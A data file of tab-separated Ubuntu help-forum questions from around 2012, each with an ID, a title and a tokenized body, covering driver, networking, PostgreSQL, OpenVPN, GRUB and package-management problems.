121896	creating symlink for postgres	as a developer , i often ssh right into my local database , just to test my application before pushing my code . however , i find that every time i want to access postgres , i have to type in postgres @ ubuntu : ~ $ /usr/local/pgsql/bin/psql test whereas on my work machine , all i have to do is type postgres @ ubuntu : ~ $ psql -- dbname=test -- username=user i tried creating a symlink , which was successful , but whenever i try connecting to it through this shortcut , i get the following error message : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? how do i get this to work ? in case it makes any difference , i 'm using a self-compiled version of the 9.1.x series . edit : i now know that this is n't really symlinking , but i 'm not sure what it 's called , or i 'm sure i would have found it on google already . basically , i want it to run from the shell by typing in psql [ options ] like rvm [ options ] or ruby [ options ] . i know there 's a package named postgresql-client-common & a bunch of other postgres packages through apt-get , but i would prefer not using the apt-get version so i can update postgres on the fly .
121900	uber-slow wifi connection on ubuntu 11.10 on my 1310-us	on ubuntu , my internet speeds ( which would normally be good ) is very crappy and i ca n't find help anywhere . please help ! i have an hp pavilion g7 1310-us and the type of wireless receiver i have is a broadcom 802.11 a/b/g/n .
121901	unable to delete or save new smb.conf	i am brand new to linux and all related stuffs , so please be gentle . i am trying to get familiar with the sharing process in linux using samba . i have gone through and created the global settings i need and the path and all that but no it wil not let me save it . i hope that is enough info to get started i 'm not new to computers just new to linux thanks in advance .
121903	open terminal in nautilus	is there any stable open terminal plugin for nautilus ?
121904	how can i find my usb2rs232 driver	i have a device that is correctly connected to my pc . but i could not see it in /dev . what does it mean ? is it because of not installing my device ? $ /dev ls before connecting my device : agpgart mei sda1 tty28 tty59 ttys30 autofs mem sda2 tty29 tty6 ttys31 block net sda5 tty3 tty60 ttys4 bsg network_latency sda6 tty30 tty61 ttys5 btrfs-control network_throughput serial tty31 tty62 ttys6 bus null sg0 tty32 tty63 ttys7 char oldmem shm tty33 tty7 ttys8 console parport0 snapshot tty34 tty8 ttys9 core port snd tty35 tty9 ttyusb0 cpu ppp stderr tty36 ttyprintk uinput cpu_dma_latency psaux stdin tty37 ttys0 urandom disk ptmx stdout tty38 ttys1 usbmon0 dri pts tty tty39 ttys10 usbmon1 ecryptfs ram0 tty0 tty4 ttys11 usbmon2 fb0 ram1 tty1 tty40 ttys12 vcs fd ram10 tty10 tty41 ttys13 vcs1 full ram11 tty11 tty42 ttys14 vcs2 fuse ram12 tty12 tty43 ttys15 vcs3 hidraw0 ram13 tty13 tty44 ttys16 vcs4 hpet ram14 tty14 tty45 ttys17 vcs5 input ram15 tty15 tty46 ttys18 vcs6 kmsg ram2 tty16 tty47 ttys19 vcsa log ram3 tty17 tty48 ttys2 vcsa1 loop0 ram4 tty18 tty49 ttys20 vcsa2 loop1 ram5 tty19 tty5 ttys21 vcsa3 loop2 ram6 tty2 tty50 ttys22 vcsa4 loop3 ram7 tty20 tty51 ttys23 vcsa5 loop4 ram8 tty21 tty52 ttys24 vcsa6 loop5 ram9 tty22 tty53 ttys25 vga_arbiter loop6 random tty23 tty54 ttys26 zero loop7 rfkill tty24 tty55 ttys27 lp0 rtc tty25 tty56 ttys28 mapper rtc0 tty26 tty57 ttys29 mcelog sda tty27 tty58 ttys3 $ /dev ls after connecting my device : agpgart mei sda1 tty28 tty59 ttys30 autofs mem sda2 tty29 tty6 ttys31 block net sda5 tty3 tty60 ttys4 bsg network_latency sda6 tty30 tty61 ttys5 btrfs-control network_throughput serial tty31 tty62 ttys6 bus null sg0 tty32 tty63 ttys7 char oldmem shm tty33 tty7 ttys8 console parport0 snapshot tty34 tty8 ttys9 core port snd tty35 tty9 ttyusb0 cpu ppp stderr tty36 ttyprintk ttyusb1 cpu_dma_latency psaux stdin tty37 ttys0 uinput disk ptmx stdout tty38 ttys1 urandom dri pts tty tty39 ttys10 usbmon0 ecryptfs ram0 tty0 tty4 ttys11 usbmon1 fb0 ram1 tty1 tty40 ttys12 usbmon2 fd ram10 tty10 tty41 ttys13 vcs full ram11 tty11 tty42 ttys14 vcs1 fuse ram12 tty12 tty43 ttys15 vcs2 hidraw0 ram13 tty13 tty44 ttys16 vcs3 hpet ram14 tty14 tty45 ttys17 vcs4 input ram15 tty15 tty46 ttys18 vcs5 kmsg ram2 tty16 tty47 ttys19 vcs6 log ram3 tty17 tty48 ttys2 vcsa loop0 ram4 tty18 tty49 ttys20 vcsa1 loop1 ram5 tty19 tty5 ttys21 vcsa2 loop2 ram6 tty2 tty50 ttys22 vcsa3 loop3 ram7 tty20 tty51 ttys23 vcsa4 loop4 ram8 tty21 tty52 ttys24 vcsa5 loop5 ram9 tty22 tty53 ttys25 vcsa6 loop6 random tty23 tty54 ttys26 vga_arbiter loop7 rfkill tty24 tty55 ttys27 zero lp0 rtc tty25 tty56 ttys28 mapper rtc0 tty26 tty57 ttys29 mcelog sda tty27 tty58 ttys3 $ lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 003 : id 093a:2510 pixart imaging , inc. optical mouse bus 002 device 004 : id 1a40:0101 terminus technology inc. usb-2.0 4-port hub bus 002 device 005 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 002 device 008 : id 067b:2303 prolific technology , inc. pl2303 serial port ttyusbx is just a usb hardware that linux detected as an attached device but it is not communicable as a serial port . in windows we have comx port and usb device and while serial driver not installed it can not be used as com port . i think ttyusbx should first detected as a com port ( ttysx ) !
121905	how to link to executable file in ubuntu 11.10 with cairo dock ?	i am using ubuntu 11.10 with cairo dock in an acer aspire with core i3 2nd gen processor with intel graphics . i downloaded a program gingkocad as a tar file , opened the package with archive manager and created a folder for the package contents . to run the program i need to click the executable to run in terminal . is there a way to create a shortcut to run the executable from an icon in cairo dock ? please help .
121909	postgresql server fail to start ubuntu ?	i have an ubuntu system and installed postgresql server on ubuntu . till yesterday evening its working fine and i did shutdown it properly . today morning when i started it then it boot and gave the below error the postgresql server failed to start . please check the log output : [ fail ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher checking for running unattended-upgrades . [ ok ] *starting bluetooth *pulse audio configured for per-user sessions saned disabled ; edit /etc/default/saned [ ok ] *checking battery status ... on this step system stay and nothing happens please help me to short out this issue thanks
121912	install wireless driver on hp g72	i installed ubuntu 10.04 on my hp g72 . all the drivers are installed except my wireless driver . i tried some solutions i saw online but none of them worked for me . can somebody help me out with it ? thanks .
121918	unable to connect to windows ad-hoc from 11.10	i am a newbie to ubuntu , and loving it except for this adhoc issue which has been bugging me for a month . i have found numerous posts on the issue with no real solutions , so let me be a bit more specific regarding the issue , and hopefully someone can help me out . i have a broadcom driver on a dell inspiron and the wifi works great . the adhoc works on a parallel installation of windows 7 , so that should mean the card supports adhoc . my friends laptop running 11.10 is able to connect to the network via adhoc with no issues , hence the network is setup right . of the many things i have tried so far , i got the ndiswrapper , tried all possible configurations ( manual configuration ) in network manager , even tried the wicd manager the latest breakthrough was when i tried sudo iwconfig wlan0 mode ad-hoc error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan0 ; operation not supported . so i tried iwconfig wlan0 and got wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off so the mode is forced to managed instead of ad-hoc so , where do i go from here ? additional information : the output for sudo lshw -c network is *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 70 : f1 : a1:89 : e7:1a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-17-generic firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f0500000-f0503fff *-network description : ethernet interface product : ar8152 v1.1 fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c1 serial : b8 : ac:6f:65 : e4:3e capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : f0400000-f043ffff ioport:2000 ( size=128 )
121925	if i install glx-dock on ubuntu 11.10 does it replace the unity launch bar ?	i want to install glx-dock on ubuntu 11.10 . i want to know if there will be any changes to the default unity launch bar ? i dont want to replace anything rather want to add a dock bar at the bottom . currently i have tint2 installed . do i need to remove it ?
121930	any physics software for ubuntu ?	i am using ubuntu 12.04 beta 2 . as a physics simulation software i tried step . but i was disappointed because i had frequent crashes with that thing . is there any good physics simulation software for ubuntu ?
121931	unity 3d not working after ubuntu 12.04 upgrade	unity 2d is working fine , but nothing is displayed ( except wallpaper ) using unity 3d . i have tried unity -- reset , but it indicated : unity-panel services : no such process i have already purges and reinstalled unity-services . also i have checked the unity plugin option in ccsm , but it goes 'uncheck ' after every restart .
121932	ath9k driver ( re ) installation	i only installed ubuntu a couple of weeks ago but my friend showed me how to use aircrack.anyways , he said that i needed to install a special driver for it and while i was trying to install it the instruction told me to uninstal the previous driver but the installation of the new driver didnt work , so now im stuck with no wireless drivers on my netbook.but , when i boot into windows it works fine , any tips ? btw , i 'm using an ar2427 wireless adapter on an asus eee pc 1001pq , please reply .
121936	pushing custom updates to ubuntu remixes	i 've created a custom distribution of ubuntu ( a `` remix '' ) that i 'd like to start distributing , but want to continue improving via updates . any suggestions on the best methods of pushing custom updates ? mainly looking to add new packages and run scripts . launchpad ? different approach ?
121938	firefox consumes too much memory	i have firefox version 11.0 and am running ubuntu 11.10 . firefox takes upto 850mb ram with only six or seven tabs opened and all the tabs loaded with light weight websites only . i wonder why would a browser consume so much memory . it keeps increasing its memory consumption over time . i have 3gb ram and most of the times firefox consumes upto 30 % of my memory . how do i fix this ? edit : the output of the command sudo iotop -opa as asked by @ jippie
121944	who decides what category the software in the ubuntu software centre is filed under , and who can we report errors to ?	i noticed when browsing through the ubuntu software centre that some programs seem to be placed in the wrong categories , for example pinta , an image editor , appears under developer tools ( instead of graphics ) in my list of installed programs . is this a case of the developer incorrectly categorising their software when they uploaded it to the software centre , or does canonical decided what goes where ? and if we notice an obvious mistake who do we inform , the software developer or file a bug somehow ?
121946	resource graphs in top panel ?	i 'm running gnome classic in ubuntu 11.10 and in previous versions of ubuntu it was fairly easy to get resource graphs to appear in the top menu , but now the regular way of getting said graphs in the top menu bar do n't work ( right clicking on the top menu produces no result unless you click on an icon , eg sound , wifi , or battery indicators ) . is it not possible to get resource graphs in the top menu bar in gnome classic on ubuntu 11.10 ? if not gnome classic , is it possible in kde ? i 've tried googling but the only results i 'm getting are related to adding the panel , which i ca n't do because i ca n't right click on the top menu . thanks in advance .
121947	installation of the catalyst drivers in a ati / intel hybrid laptop	i have installed the catalyst drivers in my ubuntu 11.10 64bit but they do n't seem to be working . lspci -nn | grep vga returns : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 ) 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc madison [ amd radeon hd 5000m series ] [ 1002:68c1 ] it seems i have 2 cards in my system , on intel and one ati , i want to work with the ati but the drivers do n't seem to be working . what can i do ? related question : how to re-configure graphics from intel integrated to intel / ati switchable ? ( describes the only switching option ( manual ) available to us - users of legacy graphics )
121959	how do i fix `` unknown error executing gpgv '' when doing sudo apt-get update ?	i got the following error reading package lists ... done w : gpg error : http : //extras.ubuntu.com oneiric release : unknown error executing gpgv executing gpgv -- -- -- -- w : gpg error : http : //archive.ubuntu.com oneiric-updates release : unknown error executing gpgv then after googling it i found and followed the following instruction but that caused one error : **sudo -i apt-get clean cd /var/lib/apt mv lists lists.old mkdir -p lists/partial apt-get clean apt-get update** while running i got the error : kapil @ ubuntu : /var/lib/apt $ sudo mv lists lists.old mv : can not move `lists ' to `lists.old/lists ' : directory not empty so once again running the update command i got the same error again . please help me what should i do ? i did the following on your advice and it showed the following root @ ubuntu : /home/kapil # df -h filesystem size used avail use % mounted on /dev/loop0 15g 4.7g 8.8g 35 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 591m 880k 590m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.5g 488k 1.5g 1 % /run/shm /dev/sda5 229g 221g 7.2g 97 % /host /dev/sda1 100m 25m 76m 25 % /media/system reserved root @ ubuntu : /home/kapil # ls -al /var/lib/apt/ total 68 drwxr-xr-x 7 root root 4096 2012-04-08 09:53 . drwxr-xr-x 58 root root 4096 2012-03-28 09:59 .. -rw-r -- r -- 1 root root 203 2012-03-24 13:18 cdroms.list -rw-r -- r -- 1 root root 7261 2012-04-06 15:27 extended_states drwxr-xr-x 2 root root 4096 2011-10-12 10:27 keyrings drwxr-xr-x 3 root root 16384 2012-04-14 06:26 lists drwxr-xr-x 4 root root 20480 2012-04-08 07:46 lists.old drwxr-xr-x 3 root root 4096 2011-10-12 10:27 mirrors drwxr-xr-x 2 root root 4096 2012-03-24 14:39 periodic* when i followed the above instruction it showed following warnings first : root @ ubuntu : /home/kapil # sudo apt-get clean root @ ubuntu : /home/kapil # sudo rm /var/lib/apt/lists/* rm : can not remove `/var/lib/apt/lists/partial ' : is a directory root @ ubuntu : /home/kapil # sudo rm /var/lib/apt/lists/partial/* root @ ubuntu : /home/kapil # sudo apt-get clean root @ ubuntu : /home/kapil # sudo apt-get update after this it again showed the error : reading package lists ... done w : gpg error : http//archive.canonical.com oneiric release : unknown error executing gpgv w : gpg error : http//extras.ubuntu.com oneiric release : unknown error executing gpgv w : gpg error : http//archive.ubuntu.com oneiric release : unknown error executing gpgv w : gpg error : http//archive.ubuntu.com oneiric-backports release : unknown error executing gpgv w : gpg error : http//archive.ubuntu.com oneiric-security release : unknown error executing gpgv w : gpg error : http//archive.ubuntu.com oneiric-proposed release : unknown error executing gpgv w : gpg error : http//archive.ubuntu.com oneiric-updates release : unknown error executing gpgv what to do now ?
121962	bumblebee ubuntu 12.04 blender	hi there i used ironhide on 11.10 but in 12.04 i can not install it because of the ppa ( possibly removed ) then i installed the bumblebee because blender does n't working with cuda suport.. does any one know a work around ? in ironhide i used optirun32 but in bumblebee that command does n't exist . i installed bumblebee from https : //wiki.ubuntu.com/bumblebee
121963	username mapped to a different account	i had 4 accounts on ubuntu 11.10 . the /home folder is in a separate partition . now , after i reinstalled ubuntu 12.04 beta 2 , i manually created the remaining 3 usernames so that it can use the existing home locations . however , after creating the users i found that the usernames have got mapped to the other home folders . for example user a got mapped to home folder of user b user b got mapped to home folder of user c user c got mapped to home folder of user a how do i change this so that the users get mapped to their correct account .
121965	rabbitvcs displaying unchanged files on commit	i have a strange problem with rabbitvcs . i 'm inside a working copy directory and i want to commit some files . when i click the commit button , the commit window shows up , but there is a strange situation . even though i have modified just a few files , the commit window is displaying all the files and directories inside working copy and the checkbox is ticked for each of them , like those files need to be committed . but those files were not changed and already exist in the repo . please see the image below to understand what i 'm saying ( the only file that is unversioned/was changed is .htaccess , therefore it should have been the only file listed there ) . has this happened to anyone ? it is a bug with rabbitvcs ( and probably a solution exists ) or am i doing something wrong ?
121969	how to avoid trying to connect to a stranger 's network with known ssid ?	my laptop knows an access point of my uncle 's place . he is using a standard one given by the isp , e.g . fritz ! box 6360 cable . alas , at my home there is also an access point with the same ssid . ubuntu tries to connect to it , which of course is futile . is there a way to make ubuntu understand which ssid it is supposed to be connecting to ?
121973	how to upgrade to latest python ?	i am using ubuntu 11.04. by default , there 's a python already installed , it is version 2.7.1+ i know the latest one is 2.7.3. when i try to upgrade it . sudo apt-get install python2.7 i told me the latest one already installed . is there a way i can remove what i have and reinstall the latest python ?
121978	graphics driver update for dell v3400	my computer is dell vostro 3400 . i installed ubuntu 11.10 recently . here is the graphics card informations : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics > controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) how do i know if i need to update my graphics card driver and which one should i choose ?
121980	`` connect to hidden wireless network '' needs always admin authorization	when i select `` connect to the hidden wireless network '' from the gnome wireless menu and select the preconfigured template , i get always an authorization box when logged in as normal user . how can i make that normal users do n't have to authenticate for connecting to a hidden wireless ?
121982	ca n't boot in kernel 'linux-image-genric 3.0.0.17.20 '	i have three linux kernels installed : 12 , 16 and 17 . kernel 12 and 16 are working fine . but when i try to boot into linux-image-generic 3.0.0.17.20 , a red screen appears and after that , nothing happens . i think this is caused by an update . here 's a screenshot of the updates i applied today : i 'm using ubuntu 11.10 32 bit . i 'm dual booting with windows 7 64 bit .
121984	wireless menu bar item does n't show up	sometimes when i start my ubuntu system the wireless menu bar item does n't show up . this makes it impossible for me to connect to a wireless network as i do n't know where the wireless menu item is hidden in the gnome menu tree how do i get my wireless menu item back again without restarting the system and why does this happen ?
121986	how do i report printing related bugs ?	as the printing stack is somewhat complex and i 'm not really familiar with it , i 'd like to know what 's the best way to report a printing related bug , as i do n't really know which part of the stack is responsible for the issue i 'm experiencing . ideally , i 'd like to use ubuntu-bug in order to provide some relevant system information with my bug report , but i do n't know which package to specify . edit : i 've just filed bug # 981586 as to ask for an apport option for filing printing related bugs .
121987	superblock errors ?	fsck /dev/sda fsck 1.42.1 ( 17-feb-2012 ) e2fsck 1.42.1 ( 17-feb-2012 ) /sbin/e2fsck : superblock invalid , trying backup blocks ... /sbin/e2fsck : bad magic number in super-block while trying to open /dev/sda hi , i had an xp installed for years , never a problem besides those created by win crap . installed ubuntu 11.10 about 15 days under a new 5gb partition created by the ubuntu installer . everything ran just fine . trying to open a gparted since about 1 week , it always says that i dont have any partition , and that 's all about whole drive unallocated space i need to take about another 5 gb from the windows partition into the linux partition with gparted but i ca n't just do anything . i just ran fsck command on /dev/sda and i got that 'superblock ' stupid message which i ca n't understand . and even in the case its an error indeed its an error created by the ubuntu installer while installing itself in the new partition created fdisk -lu shows me : disk /dev/sda : 35.9 gb , 35939409408 bytes 240 heads , 63 sectors/track , 4642 cylinders , total 70194159 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcccdcccd device boot start end blocks id system /dev/sda1 * 63 57471119 28735528+ 7 hpfs/ntfs/exfat /dev/sda2 57462782 70187039 6362129 5 extended /dev/sda5 57462784 68622335 5579776 83 linux /dev/sda6 68624384 70193151 784384 82 linux swap how can i do to fix the 'superblock ' issue ? after some research , i found out fsck does n't work on ntfs-based filesystems . after installing ntfsprogs through sudo apt-get install ntfsprogs it seems it worked . sudo apt-get install ntfsprogs sudo ln -s /usr/bin/ntfsfix /sbin/fsck.ntfs sudo ln -s /usr/bin/ntfsfix /sbin/fsck.ntfs-3g ntfsfix /dev/sda1 i was able to finally run a check unto /dev/sda1
121996	how can i fix a broken desktop due to compiz ?	i try a effect in compiz . and it make my laptop show only a desktop bakcground . i have uncheck the effect . but my laptop still show only desktop background ( no launcher , no dashboard , no date no time , etc . please help me
121997	send login details to login screen via ssh	i have set up wake up on lan on my desktop machine . what i want now is , when i wake up my ubuntu machine from hibernation , remotely enter login details so i could start desktop session . everything should be done via ssh or if possible using other methods . i searched the internet and i could n't find the answer .
121999	gnome shell + external monitor = garbage ( ubuntu 11.10 on eeepc )	i 'm using gnome shell on an asus eeepc ( atom n570 , 1gb ram , opengl renderer mesa dri intel igd ) . as soon as i connect my external monitor , i get garbage on both screens . when i disconnect , the display goes back to normal . i think i had kind of similar issues with unity 3d , where i got a message telling me that the resolution for the extended screen exceded the maximum one supported by my hardware . in that case i could choose to lower the resolution , clone the displays , turn of the eeepc 's one . here i seem not to have control at all , since the switch happens when i connect the cable . what can i do ? is there a solution ( which does n't involve dropping gnome shell ) ? thanks !
122000	unable to mount seagate array from iomega	i am new to ubuntu so please be kind ! my ( windows based ) iomega storcentre ix2-200 stopped working , with all my business data upon it . iomega helpfully told me that i should get fedora , remove the seagate hard drives and recover the information by connecting via a usb / sata cable . first i could not get fedora to load ( due to it needing an internet connection before loading complete ) so i got ubuntu - much easier to load . yesterday i had one icon on computer showing marked `` array '' , this morning i have two icons one entitled `` 1 '' , and the other `` raid-1 array '' , both have an icon on top that is a pale blue circle with a `` 1 '' in the middle . i have downloaded mdadm . i have used fdisk -l and had the following response from linux : disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x246b3fe6 device boot start end blocks id system /dev/sdc1 1 1953525167 976762583+ ee gpt i have tried the `` mount '' command but either am using the wrong file type ( i ca n't seem to find anywhere what system is used ) or simply do n't know how to do it .
122006	installation problem macbuntu 10.10	10 and i have edited install.sh file and tried to install the command sashi @ sashi-system-product-name : ~ $ cd macbuntu10.10 bash : cd : macbuntu10.10 : no such file or directory sashi @ sashi-system-product-name : ~ $ cd macbuntu-10.10 sashi @ sashi-system-product-name : ~/macbuntu-10.10 $ sudo atp-get install ./install.sh its not happening . plz help !
122009	from xubuntu to lubuntu	i use xubuntu 11.10 on my 10+ years old pc ( 2,8ghz,512ram , 80gb ) . is it possible to upgrade to lubuntu 12.4 when released ? am i gon na see any difference practically ? shall i have to install all my packages from the begining again ?
122017	bricscad v12 on ubuntu 11.10 !	i tried to install bricscad from the deb file but is for 32bit systems.so i had problems and i downloaded the .tgz file and ran tar -xvf and i was in the directory /opt/bricsys/bricscad/v12 so i managed to run bricscad with the command sudo sh bricscad.sh in the directory this.so my question is , do you have any idea of how to make a launcher or smthing so i can run the program from an easier way ? i can not find it in dash ( unity ) or in the desktop . any help will be great ! thanks
122021	how do i upgrade to xz 5.0.3 without it hosing my system	ok , so i was getting ready to do a lsf using ubuntu 11.10 as the host file . but the lsf book says i need xz 5.0.3 as a pre-requisite for doing it . when i tried to compile and install 5.0.3 i had to reinstall so my system was usable without any errors . how can i upgrade to zx 5.0.3 from the current 5.0.2 so that i can have everything i need ?
122033	xen 4.1 + nvidia driver = unity has no window decorations	i am running ubuntu 11.10 with unity . i installed xen and booted its kernel . the machine booted normally . however , when i started unity ( 3d ) , there were no window decorations . i tried unity 2d and the window decorations are present there . i then decided to remove the driver ( installed through additional drivers ) and install it manually like this : ignore_xen_presence=y cc= '' gcc -dnv_vmap_4_present -dnv_signal_struct_rlim '' ./nvidia* ... but the window decorations were still missing in unity 3d . the window decorations are there when i boot the regular ubuntu kernel ( without xen support ) . what could be the problem and how to fix it ?
122035	where can i find this graphics file from the installer ?	i 've installed ubuntu 12.04 beta2 today , and i stumbled upon this graphic during installation . does anyone know , where in system i could find it and extract it , to use it i.e . as a wallpaper ? cheers , kuba
122038	mounting/unmounting truecrypt volumes without opening the program	i used the advice given at the end of this article to mount a truecrypt volume by double-clicking it . but i ca n't unmount it without opening truecrypt ( umount : /media/truecrypt1 is not in the fstab ( and you are not root ) ) so being able to mount it without opening the program is kind of a moot achievement . any suggestions ?
122039	can i use dconf-editor to modify gconf settings ?	can i get `` dconf-editor '' to show as much information as `` gconf-editor '' did in 11.04 ? i find using the gconf version much easier and has better application integration . i have both installed . are there additional packages to make this improvement ?
122040	gnome-control-center ca n't set display resolution under openbox	i 'm running ubuntu 11.10 with openbox on my laptop . since i need to plug different external displays into it and openbox environment does n't automatically pick them up , i thought the best solution i can come up with is to use gnome-control-center and it 's display settings tool from within openbox . but although this tool does detect monitors correctly , it ca n't do any change -- clicking apply button just does n't seem to do anything . so my questions are : 1 ) how to get this tool working ? 2 ) how to run `` displays '' tool directly from command-line , skipping control center ? 3 ) is there a better way to automatically detect and set resolutions on internal/external monitors under openbox ? please note i tried arandr too and it does n't even work for my environment ( does n't detect external display plugging in at all ) . for what it 's worth , my laptop is lenovo g560 , ubuntu is x64 version with all the updates rolled over . thanks for your consideration .
122041	e-mail account hijacked	i have an aol e-mail account that was obviously hijacked as two messages containing a link were send to all my contacts . when i locked into my account it was closed as aol had noticed some irregular traffic . i am using ubuntu 11.10 . my question is : is this some hacked the infos on the aol server or is there a possibility that there is bot malware in my system ? if so what should i do ?
122043	system configuration and date time missing	i am using ubuntu 12.04 fully updated . date is missing in unity top panel . when i go to system configuration , it does not work . also , i can not change my wallpaper because system configuration does not work . any suggestions ?
122055	poor system performance on my machine running ubuntu 12.04 ( beta 2 updated to the present moment )	why is it that my system dies when multitasking ( it is happening from 11.10 ) on ubuntu11.10 ( unity ) , kubuntu 11.10 ( kde ) and deepin linux which is based on 11.10 ( gnome-shell ) the thing is that i thought with 12.04 i would get performance like i used to get on 11.04 on which everything used to run fine without any lag or hiccups . the same lagging ( browser starts to stutter , increased delay in the launching of dash and applications ) is happening on 12.04 http : //i.imgur.com/ychkb.png and http : //i.imgur.com/uyxla.png . i believe that my system configuration is sufficient for running ubuntu as you can check here http : //paste.ubuntu.com/929734/ . i had the google voice and chat plugin installed on 12.04 so someone suggested that i should remove that and see if the performance improves but no such respite ( i am having this on multiple operating system based on ubuntu 11.10 as i have mentioned above ) . on a friends suggestion ran memory test through partition magic and my system passed that fine . one thing more that i would like to know is that why when i have 2gb ram and 2.1gb swap does my system starts lag and run poorly when ram consumption goes 500+ . if you require anymore information i will gladly provide it .
122058	how do i make a digital certificate available to libreoffice writer for digital signatures ?	i obtained a client certificate from cacert through firefox . i want to use that certificate to sign a document created with libreoffice writer . in writer , i click file > digital signatures ... to get the digital signatures dialog which is supposed to show the list of certificates available . the list is empty . how can i make the certificate , which i obtained via firefox , available to writer ?
122073	is it possible to ssh into ubuntu server with keys and from another computer using password ?	i have ubuntu server at home , and i use ssh keys to log in via terminal from my laptop . rarely , but mostly from work , i need to access this server , but i dont want to copy keys on my work laptop - id rather just use plain password for that . so if i enable password log in from ssh config file , it will ask me password on my laptop too even though it contains keys , right ? is there a way to stop this behavior ? thanks .
122075	getting openvpn working ubuntu	i am trying to set up a vpn over a few vms that i have . i created an openvpn server on ubuntu 10.04 and am trying to configure the client using 12.04 . i followed these instructions here https : //help.ubuntu.com/10.04/serverguide/c/openvpn.html , except for some changes to the config files . when i run openvpn -- config client.conf on the client , i get this . sat apr 14 15:11:26 2012 openvpn 2.2.1 i686-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on mar 30 2012 sat apr 14 15:11:26 2012 warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . sat apr 14 15:11:26 2012 note : openvpn 2.1 requires ' -- script-security 2 ' or higher to call user-defined scripts or executables sat apr 14 15:11:26 2012 can not load private key file /home/fpayer/keys/cerberus.crt : error:0906d06c : pem routines : pem_read_bio : no start line : error:140b0009 : ssl routines : ssl_ctx_use_privatekey_file : pem lib sat apr 14 15:11:26 2012 error : private key password verification failed sat apr 14 15:11:26 2012 exiting i have verified that the file exists , and it looks fine to me although i do not know much about ssl . it seems to me like it is looking for a .pem , but the instructions never said to generate one . i also find it strange that i can connect thru network manager , but can not ping the server , maybe it 's a problem with network manager . what should i do to get the client working ? here are my config files : server : port 1194 proto udp dev tun0 ca /etc/openvpn/easy-rsa/keys/ca.crt cert /etc/openvpn/easy-rsa/keys/vpn-server.crt key /etc/openvpn/easy-rsa/keys/vpn-server.key dh /etc/openvpn/dh1024.pem server 10.8.0.1 255.255.255.0 ifconfig-pool-persist openvpn.dhcp keepalive 10 120 comp-lzo user nobody group nogroup persist-key persist-tun status /var/log/openvpn/openvpn-status.log log-append /var/log/openvpn/openvpn.log verb 4 mute 20 ; push `` route 192.168.0.0 255.255.255.0 '' ; push `` route 192.168.173.0 255.255.255.0 '' ; push `` redirect-gateway def1 '' ; client-config-dir ccd ; route 192.168.40.128 255.255.255.248 ; client-to-client ; max-clients 10 client : client dev tun0 proto udp remote 192.168.1.6 1194 resolv-retry infinite nobind user nobody group nogroup persist-key persist-tun ca /home/fpayer/keys/ca.crt cert /home/fpayer/keys/cerberus.crt key /home/fpayer/keys/cerberus.crt tls-auth /home/fpayer/keys/ta.key 1 verb 3 if you could find any problems in either config file or fixing the key verification , it would be greatly appreciated . server ip :192.168.1.6 client ip : 192.168.1.7
122078	grub - multiple distros	i had ubuntu 12.04 beta installed on my entire hd . then i decided to also install linux mint debian edition 121204 ( lmde ) . with gparted i shrunk my /home to make room for one more distro i created the partitions needed for lmde , but figured i could use the same swap i installed lmde - no errors . during install i selected to install grub to /dev/sda grub shows linux mint debian edition , but no sign of ubuntu the new lmde install will not boot i can use lmde from usb stick , which is what i use right now my ubuntu /home has data that is not backed up ( must recover ) if i can boot back into ubuntu to back up i am ok again . please help . from gparted ( sda8 and sda9 is the new ones after shrinking sda7 ) /dev/sda1 ext4 20 gb flags : boot /dev/sda2 extended 912 gb dev/sda5 ext4 20 gb dev/sda6 linux-swap 4 gb dev/sda7 ext4 585 gb dev/sda8 ext4 20 gb dev/sda9 ext4 285 gb
122080	track ping , download and upload daily	i 'm with some problems with my internet with oscillations in connection , causing some sites to get `` not found '' page sometimes . this is n't all the time , just some random times daily . my question is . there is any tool to monitor these basic information ( ping , upload and download ) daily to make an report and check the oscillations ? because , if someone from internet provider come at my house , probably it wo n't see the oscillations .
